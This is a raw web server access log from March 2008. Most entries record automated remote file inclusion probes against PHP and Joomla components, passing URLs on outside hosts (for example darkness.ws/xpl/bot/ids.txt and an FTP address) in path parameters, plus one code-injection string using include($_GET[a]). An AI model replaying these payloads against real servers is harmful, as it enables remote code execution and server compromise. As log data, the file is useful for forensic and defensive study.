74.50.105.133 - - [23/Mar/2008:19:55:28 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
69.66.77.224 - - [23/Mar/2008:19:55:51 -0700] "GET //administrator/index.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
69.10.154.114 - - [23/Mar/2008:19:57:20 -0700] "GET /logs/access_log.20080113//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
87.106.9.138 - - [23/Mar/2008:19:57:30 -0700] "GET /logs/error_log.20080224//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
67.212.173.42 - - [23/Mar/2008:19:57:45 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.212.173.42 - - [23/Mar/2008:19:57:45 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 238 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.92.85.176 - - [23/Mar/2008:19:59:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
206.53.51.240 - - [23/Mar/2008:19:59:41 -0700] "GET /logs/access_log//header.php?css_path=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
206.53.51.240 - - [23/Mar/2008:19:59:41 -0700] "GET //header.php?css_path=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
206.53.51.240 - - [23/Mar/2008:19:59:41 -0700] "GET /logs//header.php?css_path=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.50.105.133 - - [23/Mar/2008:20:00:24 -0700] "GET /logs/access_log.2008020316/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 291 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:20:00:24 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:20:00:24 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.808"
210.109.103.220 - - [23/Mar/2008:20:00:30 -0700] "GET /logs/error_log//modules/agendax/configure.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
210.109.103.220 - - [23/Mar/2008:20:00:31 -0700] "GET //modules/agendax/configure.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
210.109.103.220 - - [23/Mar/2008:20:00:31 -0700] "GET /logs//modules/agendax/configure.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
72.29.70.163 - - [23/Mar/2008:20:00:35 -0700] "GET /logs/error_log.20080210//mvcw_conver.php?step=http://www.liautism.com/media/id.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
72.29.70.163 - - [23/Mar/2008:20:00:35 -0700] "GET //mvcw_conver.php?step=http://www.liautism.com/media/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
72.29.70.163 - - [23/Mar/2008:20:00:35 -0700] "GET /logs//mvcw_conver.php?step=http://www.liautism.com/media/id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:20:00:44 -0700] "GET /logs/access_log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.808"
80.253.99.164 - - [23/Mar/2008:20:00:53 -0700] "GET /logs/access_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.808"
80.253.99.164 - - [23/Mar/2008:20:00:53 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
80.253.99.164 - - [23/Mar/2008:20:00:53 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
210.109.103.220 - - [23/Mar/2008:20:01:33 -0700] "GET /logs/access_log//modules/agendax/configure.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
74.50.105.133 - - [23/Mar/2008:20:02:07 -0700] "GET /logs/access_log.2008020316/modules/My_eGallery/index.php?basepath=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.808"
160.99.12.231 - - [23/Mar/2008:20:02:50 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:20:02:50 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:20:03:06 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:20:03:06 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
80.253.99.164 - - [23/Mar/2008:20:03:30 -0700] "GET /logs/error_log.20080224//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
160.99.12.231 - - [23/Mar/2008:20:04:30 -0700] "GET /logs/access_log.20080210//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:20:04:30 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 200 698 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:20:04:31 -0700] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 200 6086 "-" "libwww-perl/5.65"
72.29.70.163 - - [23/Mar/2008:20:04:34 -0700] "GET /logs/access_log.20080113//mvcw_conver.php?step=http://www.liautism.com/media/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
195.137.139.73 - - [23/Mar/2008:20:07:37 -0700] "GET /logs/access_log/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
58.65.239.170 - - [23/Mar/2008:20:07:39 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 417792 "-" "-"
67.195.44.110 - - [23/Mar/2008:20:08:45 -0700] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.108 - - [23/Mar/2008:20:08:49 -0700] "GET /logs/access_log.20080127 HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.186.169.183 - - [23/Mar/2008:20:09:03 -0700] "GET /?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 698 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
208.186.169.183 - - [23/Mar/2008:20:09:03 -0700] "GET /logs/?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 6081 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
87.230.15.10 - - [23/Mar/2008:20:10:16 -0700] "GET /logs/access_log.20080210/index.php?pagina=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:20:10:16 -0700] "GET /index.php?pagina=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:20:10:16 -0700] "GET /logs/index.php?pagina=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
69.61.37.111 - - [23/Mar/2008:20:10:17 -0700] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:20:10:17 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:20:10:44 -0700] "GET /logs/error_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:20:10:50 -0700] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:20:10:50 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:20:11:13 -0700] "GET /logs/error_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.808"
69.10.154.114 - - [23/Mar/2008:20:13:46 -0700] "GET /logs/error_log.20080210//mvcw_conver.php?step=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
69.10.154.114 - - [23/Mar/2008:20:13:47 -0700] "GET //mvcw_conver.php?step=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
69.10.154.114 - - [23/Mar/2008:20:13:47 -0700] "GET /logs//mvcw_conver.php?step=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
204.9.78.190 - - [23/Mar/2008:20:13:54 -0700] "GET /?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 200 698 "-" "libwww-perl/5.805"
206.53.51.240 - - [23/Mar/2008:20:14:01 -0700] "GET /logs/error_log.20080210//mvcw_conver.php?step=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
206.53.51.240 - - [23/Mar/2008:20:14:01 -0700] "GET //mvcw_conver.php?step=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
206.53.51.240 - - [23/Mar/2008:20:14:01 -0700] "GET /logs//mvcw_conver.php?step=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
210.188.214.241 - - [23/Mar/2008:20:15:06 -0700] "GET /logs/access_log.20080106/Scanner252http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
66.7.207.104 - - [23/Mar/2008:20:15:11 -0700] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:15:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:15:11 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:16:23 -0700] "GET /logs/error_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.808"
213.92.85.176 - - [23/Mar/2008:20:17:52 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
206.53.51.240 - - [23/Mar/2008:20:19:01 -0700] "GET /logs/access_log.20080113//mvcw_conver.php?step=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
69.10.154.114 - - [23/Mar/2008:20:19:13 -0700] "GET /logs/access_log.20080113//mvcw_conver.php?step=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:19:54 -0700] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:19:54 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:19:54 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:21:03 -0700] "GET /logs/error_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:21:45 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:21:46 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
213.92.85.176 - - [23/Mar/2008:20:23:40 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
66.7.207.104 - - [23/Mar/2008:20:24:00 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:24:00 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:20:24:14 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:20:25:40 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
87.118.102.153 - - [23/Mar/2008:20:26:34 -0700] "GET /index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
87.118.102.153 - - [23/Mar/2008:20:26:34 -0700] "GET /logs/index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 232 "-" "Microsoft Pocket Internet Explorer/0.6"
66.7.207.104 - - [23/Mar/2008:20:27:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:27:11 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
208.186.169.183 - - [23/Mar/2008:20:27:15 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
208.186.169.183 - - [23/Mar/2008:20:27:16 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 271 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
67.195.44.110 - - [23/Mar/2008:20:27:17 -0700] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.101 - - [23/Mar/2008:20:27:20 -0700] "GET /logs/access_log.20080120 HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.52.195.135 - - [23/Mar/2008:20:27:22 -0700] "GET /logs/index.php?option=com_sef-&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
72.52.195.135 - - [23/Mar/2008:20:27:22 -0700] "GET /index.php?option=com_sef-&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
58.65.239.170 - - [23/Mar/2008:20:27:30 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 475136 "-" "-"
69.61.37.111 - - [23/Mar/2008:20:27:34 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.808"
213.92.85.176 - - [23/Mar/2008:20:27:47 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
160.99.12.231 - - [23/Mar/2008:20:27:53 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:20:27:54 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.65"
74.200.201.194 - - [23/Mar/2008:20:28:44 -0700] "GET /logs/access_log.20080203/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
74.200.201.194 - - [23/Mar/2008:20:28:44 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
74.200.201.194 - - [23/Mar/2008:20:28:44 -0700] "GET /logs/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
74.200.201.194 - - [23/Mar/2008:20:28:56 -0700] "GET /logs/access_log/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.808"
160.99.12.231 - - [23/Mar/2008:20:29:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:20:29:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.65"
74.200.201.194 - - [23/Mar/2008:20:30:45 -0700] "GET /logs/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
74.200.201.194 - - [23/Mar/2008:20:30:45 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
87.230.15.10 - - [23/Mar/2008:20:31:58 -0700] "GET /logs/access_log/index.php?pagina=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
72.46.128.50 - - [23/Mar/2008:20:32:06 -0700] "GET /logs/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
72.46.128.50 - - [23/Mar/2008:20:32:07 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
190.54.28.163 - - [23/Mar/2008:20:33:58 -0700] "GET /logs/error_log.20080224//templates/mangobery/footer.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
160.99.12.231 - - [23/Mar/2008:20:34:29 -0700] "GET /logs/access_log.20080210/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 291 "-" "libwww-perl/5.65"
213.92.85.176 - - [23/Mar/2008:20:35:44 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
213.92.85.176 - - [23/Mar/2008:20:35:44 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
74.95.82.113 - - [23/Mar/2008:20:35:44 -0700] "GET /logs/index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
74.95.82.113 - - [23/Mar/2008:20:35:49 -0700] "GET /index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
160.99.12.231 - - [23/Mar/2008:20:36:17 -0700] "GET /logs/access_log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 282 "-" "libwww-perl/5.65"
66.7.207.104 - - [23/Mar/2008:20:38:08 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:38:08 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:20:38:11 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
74.6.31.215 - - [23/Mar/2008:20:39:25 -0700] "GET /logs/access_log.20080127 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
160.99.12.231 - - [23/Mar/2008:20:39:56 -0700] "GET /logs/error_log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:20:41:06 -0700] "GET /logs/access_log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 282 "-" "libwww-perl/5.65"
216.145.11.94 - - [23/Mar/2008:20:41:25 -0700] "GET /robots.txt HTTP/1.0" 404 204 "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)"
216.145.11.94 - - [23/Mar/2008:20:41:25 -0700] "GET / HTTP/1.1" 200 698 "http://www.whois.sc/evolutionarts.net" "SurveyBot/2.3 (Whois Source)"
74.200.201.194 - - [23/Mar/2008:20:41:27 -0700] "GET /logs/error_log.20080127/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.808"
74.200.201.194 - - [23/Mar/2008:20:41:27 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
74.200.201.194 - - [23/Mar/2008:20:41:28 -0700] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.808"
74.200.201.194 - - [23/Mar/2008:20:42:39 -0700] "GET /logs/access_log.20080127/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
160.99.12.231 - - [23/Mar/2008:20:43:14 -0700] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.65"
66.36.241.244 - - [23/Mar/2008:20:43:14 -0700] "GET /logs/access_log.20080203/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
66.36.241.244 - - [23/Mar/2008:20:43:14 -0700] "GET /index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
66.36.241.244 - - [23/Mar/2008:20:43:14 -0700] "GET /logs/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
160.99.12.231 - - [23/Mar/2008:20:44:06 -0700] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.65"
